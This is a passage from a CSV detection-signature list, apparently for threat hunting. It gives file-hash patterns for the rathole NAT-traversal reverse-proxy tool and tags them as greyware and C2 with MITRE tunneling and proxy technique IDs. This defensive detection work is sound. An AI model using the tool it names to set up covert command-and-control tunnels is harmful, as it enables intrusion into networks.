TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*10667fa9b2ff274ad3ad30e8747278bf55a1ff2b47db7fe43216e5f77c15ed3d*",".{0,1000}10667fa9b2ff274ad3ad30e8747278bf55a1ff2b47db7fe43216e5f77c15ed3d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*113d243a2931e1b1b610181229a9e52d3ebd47fde7b5c2f286b8d54aed09efba*",".{0,1000}113d243a2931e1b1b610181229a9e52d3ebd47fde7b5c2f286b8d54aed09efba.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*113f78974c687c8bc7ba3ae62843a9fdb1d767c85fbbda7779e7199b5a560100*",".{0,1000}113f78974c687c8bc7ba3ae62843a9fdb1d767c85fbbda7779e7199b5a560100.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*137fc29ed639a8b44b3056598d1c85505650b5ad3a4a4e392b084ee7345e58b7*",".{0,1000}137fc29ed639a8b44b3056598d1c85505650b5ad3a4a4e392b084ee7345e58b7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*14e7065f629b384425308287023f0bd181c464ea522109846c2d7db26ad29608*",".{0,1000}14e7065f629b384425308287023f0bd181c464ea522109846c2d7db26ad29608.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*14ebe6f781314c1d68eecca437483e92b621ca69f8859a652d73a94dd0a93018*",".{0,1000}14ebe6f781314c1d68eecca437483e92b621ca69f8859a652d73a94dd0a93018.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*15b24f9b6d402b8f55a96f9deea8cc387513c040030428d9c32dbfb1013d912f*",".{0,1000}15b24f9b6d402b8f55a96f9deea8cc387513c040030428d9c32dbfb1013d912f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*167a5fd6a1435ef23452aabcc251924144c04fb75cba9d178d3b4eec0a0b89d6*",".{0,1000}167a5fd6a1435ef23452aabcc251924144c04fb75cba9d178d3b4eec0a0b89d6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*189b30810273723068cc1de34f0898f999fb1e8e912140e78119f588de4c613b*",".{0,1000}189b30810273723068cc1de34f0898f999fb1e8e912140e78119f588de4c613b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*191768fc581508bcc3426c4ed5d227ff4b075d6d1d5309d220d144486d8490d1*",".{0,1000}191768fc581508bcc3426c4ed5d227ff4b075d6d1d5309d220d144486d8490d1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*193051af6c427627482ae2318feff8615ce834f3c00cb61d7a12e71bfabc60f3*",".{0,1000}193051af6c427627482ae2318feff8615ce834f3c00cb61d7a12e71bfabc60f3.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*197893f2048f9925f1e6ed4e292ac9e7fc5923fa06cb27f994d26572e8015263*",".{0,1000}197893f2048f9925f1e6ed4e292ac9e7fc5923fa06cb27f994d26572e8015263.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1a451fd4ea04c5e764361e14cf2458ed4c3880659d0aa664c9dbc5ab74d7b44e*",".{0,1000}1a451fd4ea04c5e764361e14cf2458ed4c3880659d0aa664c9dbc5ab74d7b44e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1a7124d26b8e5b879fd245cd8c0d0eae962a3aa7e897d7cecf23c38528a3f58c*",".{0,1000}1a7124d26b8e5b879fd245cd8c0d0eae962a3aa7e897d7cecf23c38528a3f58c.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1b501cd229b855a0d7c4fe904c512ea453a3c1b225f55f03a4577e91cc434aaf*",".{0,1000}1b501cd229b855a0d7c4fe904c512ea453a3c1b225f55f03a4577e91cc434aaf.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1c4cd487862b68af1e3319e7f37e3b37db822b41e580528653c16264e5d44c40*",".{0,1000}1c4cd487862b68af1e3319e7f37e3b37db822b41e580528653c16264e5d44c40.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1c722fc7d3e234e27029f791232f8f19460b02226f80d391ab8f2102b5f76c29*",".{0,1000}1c722fc7d3e234e27029f791232f8f19460b02226f80d391ab8f2102b5f76c29.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1d55ef3e801a86435e2146f3409669fd31cb572500f3da333109f017181114c5*",".{0,1000}1d55ef3e801a86435e2146f3409669fd31cb572500f3da333109f017181114c5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1df13a2ce963c124cb494c745e67d8bf8abb87b94a9b640e5143b16138cb5d2d*",".{0,1000}1df13a2ce963c124cb494c745e67d8bf8abb87b94a9b640e5143b16138cb5d2d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*1e8312b30e0290161f6304f3fe76b7bf1cd111038b09e423f3d30ce1e77a7bdc*",".{0,1000}1e8312b30e0290161f6304f3fe76b7bf1cd111038b09e423f3d30ce1e77a7bdc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*21fc8fb357996e9e95c04088f5fdc06cf2862bb7cb074e0f2919e9ed015ee884*",".{0,1000}21fc8fb357996e9e95c04088f5fdc06cf2862bb7cb074e0f2919e9ed015ee884.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*22eb2e3f446e71d111afbe7e10ec82d0c729545e7823d9ca860f3a65754cc200*",".{0,1000}22eb2e3f446e71d111afbe7e10ec82d0c729545e7823d9ca860f3a65754cc200.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*24f8d15c5c09600a2138153f68eebed5831b31d90ae785bf4d25c6129afe2be5*",".{0,1000}24f8d15c5c09600a2138153f68eebed5831b31d90ae785bf4d25c6129afe2be5.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*261dc25293f04e40a09a24fd1e039041aea5e27afa7ddb234db3882b74b396ca*",".{0,1000}261dc25293f04e40a09a24fd1e039041aea5e27afa7ddb234db3882b74b396ca.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*262a3f517a064466994ff41b9fa24f03b5df660adf9a4ff53ad34fd071bd85a9*",".{0,1000}262a3f517a064466994ff41b9fa24f03b5df660adf9a4ff53ad34fd071bd85a9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*26600cf2666c1482269a4844910e9af915894981dedd319dfa47e7f3240dba7e*",".{0,1000}26600cf2666c1482269a4844910e9af915894981dedd319dfa47e7f3240dba7e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*272c46ee6c8dc5d08397a2d602e398ca5465bce04df1571fc53ee993ea58d95f*",".{0,1000}272c46ee6c8dc5d08397a2d602e398ca5465bce04df1571fc53ee993ea58d95f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2874343d4ca8de15f5a994dbf330d7497cc6798e5685db1d3c4a64ed160dffd2*",".{0,1000}2874343d4ca8de15f5a994dbf330d7497cc6798e5685db1d3c4a64ed160dffd2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*28b4073db264ae8edbbc66194419ba03950a22c63c88555978a6d4747245c9e8*",".{0,1000}28b4073db264ae8edbbc66194419ba03950a22c63c88555978a6d4747245c9e8.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2a7a2455eaa1b1bf0ae58b1edd93acc514b4f985ec57c681e85d7490e50402f9*",".{0,1000}2a7a2455eaa1b1bf0ae58b1edd93acc514b4f985ec57c681e85d7490e50402f9.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2abf5f64cce68069617766e7d6c105b71215fc936574e31c13a8aa116c14ac4e*",".{0,1000}2abf5f64cce68069617766e7d6c105b71215fc936574e31c13a8aa116c14ac4e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2b33ead1b58d9e5254447cef54119027e5b1ca360c88e5929bff19685955d668*",".{0,1000}2b33ead1b58d9e5254447cef54119027e5b1ca360c88e5929bff19685955d668.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2b3f74062d1303d71cd368b1090436d1aeddecf45e8561bd94f9fe412dd1abff*",".{0,1000}2b3f74062d1303d71cd368b1090436d1aeddecf45e8561bd94f9fe412dd1abff.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2b4df7d7756102aadcdeda533e9372a45ede141300ef3d7941dd0d445de8adb6*",".{0,1000}2b4df7d7756102aadcdeda533e9372a45ede141300ef3d7941dd0d445de8adb6.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2da2aa0a3d231a0b7aee9d0bbd71e6c20a836def31a42711875acc0eeee75635*",".{0,1000}2da2aa0a3d231a0b7aee9d0bbd71e6c20a836def31a42711875acc0eeee75635.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2e90b0aeb75f7fc93b683697981df8cbcc207690fc550f0d36d80d2281ce4d14*",".{0,1000}2e90b0aeb75f7fc93b683697981df8cbcc207690fc550f0d36d80d2281ce4d14.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2f3b4900a63d32a14e1578b2de68f78daad89b7c47b9388c26d922962faef430*",".{0,1000}2f3b4900a63d32a14e1578b2de68f78daad89b7c47b9388c26d922962faef430.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*2f747edb8eed5af60f18975abb44746e3986e332b6099764f91b6e2882736150*",".{0,1000}2f747edb8eed5af60f18975abb44746e3986e332b6099764f91b6e2882736150.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*30338174d43234b97ffa081de00dc8364df7e1bc50e69ebba7c915c61adfacf1*",".{0,1000}30338174d43234b97ffa081de00dc8364df7e1bc50e69ebba7c915c61adfacf1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*308128ad3679e15f7992bcb3305e5a286a8a865df3ee7e6b3e4a07b5a041a46a*",".{0,1000}308128ad3679e15f7992bcb3305e5a286a8a865df3ee7e6b3e4a07b5a041a46a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*335ce7cb470142a3022d1158a8f102bcd97a8a0348d47022c4674d70a1487e6e*",".{0,1000}335ce7cb470142a3022d1158a8f102bcd97a8a0348d47022c4674d70a1487e6e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*336cc961fe07dfb37fc61a5b585ae5b9e966389062aa2cc0d70d282e56edf32f*",".{0,1000}336cc961fe07dfb37fc61a5b585ae5b9e966389062aa2cc0d70d282e56edf32f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*348064a4a5a249c2e4a76251dea47477f366babc23bb26633923c75302d844f2*",".{0,1000}348064a4a5a249c2e4a76251dea47477f366babc23bb26633923c75302d844f2.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*357374d483045884038aa500fdba371af79e095d8e900f2d49bc23c45348ac07*",".{0,1000}357374d483045884038aa500fdba371af79e095d8e900f2d49bc23c45348ac07.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*37bc6496577a618cfba0ea53759dabf7e01e218ede999d5290d32040cd219eba*",".{0,1000}37bc6496577a618cfba0ea53759dabf7e01e218ede999d5290d32040cd219eba.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*38c02b41d5db41d58683737cb04191cdfd3b61f41d31dc14b8d68a3a141cc647*",".{0,1000}38c02b41d5db41d58683737cb04191cdfd3b61f41d31dc14b8d68a3a141cc647.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*391fd08daf4986afda1690225e4d9fed0c6d36ad1a56e4362cd8f2797e2ac93a*",".{0,1000}391fd08daf4986afda1690225e4d9fed0c6d36ad1a56e4362cd8f2797e2ac93a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*39433eab5c47e1153d8e17086402f2848b7ba868df213fce01db52a664f53d64*",".{0,1000}39433eab5c47e1153d8e17086402f2848b7ba868df213fce01db52a664f53d64.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3a4ce767d5ff5706372f654aa5ccf01bf84d10dc87777094be635dca8869ed39*",".{0,1000}3a4ce767d5ff5706372f654aa5ccf01bf84d10dc87777094be635dca8869ed39.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3b96ccd1383bbd60d1b79867f5ed32bd15778b94399fb891c3172ea02516ccb1*",".{0,1000}3b96ccd1383bbd60d1b79867f5ed32bd15778b94399fb891c3172ea02516ccb1.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3bbd5d43f581b39aa84a88d801f48506ab3105b7f958ea718556b4faa4564c0f*",".{0,1000}3bbd5d43f581b39aa84a88d801f48506ab3105b7f958ea718556b4faa4564c0f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3dc341f1a1daa80084699b292d0493012a3a85a5cbc157f6984c04def0d2dce7*",".{0,1000}3dc341f1a1daa80084699b292d0493012a3a85a5cbc157f6984c04def0d2dce7.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3e7d0d0f365120cd3cd351d147d1a12ee960c8068b464d4dd533a3821873b80e*",".{0,1000}3e7d0d0f365120cd3cd351d147d1a12ee960c8068b464d4dd533a3821873b80e.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3f04e968871c818880aa23cecc9239651b7e550a625d655236690af22ea2bbdc*",".{0,1000}3f04e968871c818880aa23cecc9239651b7e550a625d655236690af22ea2bbdc.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*3fad6d60c83b9bce3ca61da5ef4cd799d91e6c1f17db783ebd515953c392cd4a*",".{0,1000}3fad6d60c83b9bce3ca61da5ef4cd799d91e6c1f17db783ebd515953c392cd4a.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*40fa588b18db010c3b2826ea38be66a2894f95e284682caf14bc8894b16c4cae*",".{0,1000}40fa588b18db010c3b2826ea38be66a2894f95e284682caf14bc8894b16c4cae.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*427b5beef3af730379ab66c28fe12f192768f4aebcd24e02f540feee952d001f*",".{0,1000}427b5beef3af730379ab66c28fe12f192768f4aebcd24e02f540feee952d001f.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*42850266bcac0528664c59738c32ba234582c70ffa0326b35c79612914961740*",".{0,1000}42850266bcac0528664c59738c32ba234582c70ffa0326b35c79612914961740.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*43486a6363b656d155d759db8a67e2e7264c38984c9ffa2d7449dfb085ad009d*",".{0,1000}43486a6363b656d155d759db8a67e2e7264c38984c9ffa2d7449dfb085ad009d.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - TA0005","N/A","N/A","C2","https://github.com/rapiz1/rathole","1","0","#filehash","N/A","10","10","9261","467","2024-07-06T20:09:48Z","2021-12-14T05:03:07Z" "*45f654720ebb2583ea767c849f3ac197e386c6a8dd0015db4084603da6c9ae8b*",".{0,1000}45f654720ebb2583ea767c849f3ac197e386c6a8dd0015db4084603da6c9ae8b.{0,1000}","greyware_tool_keyword","rathole"," expose the service on the device behind the NAT to the Internet, via a server with a public IP.","T1572 - T1090","TA0011 - 
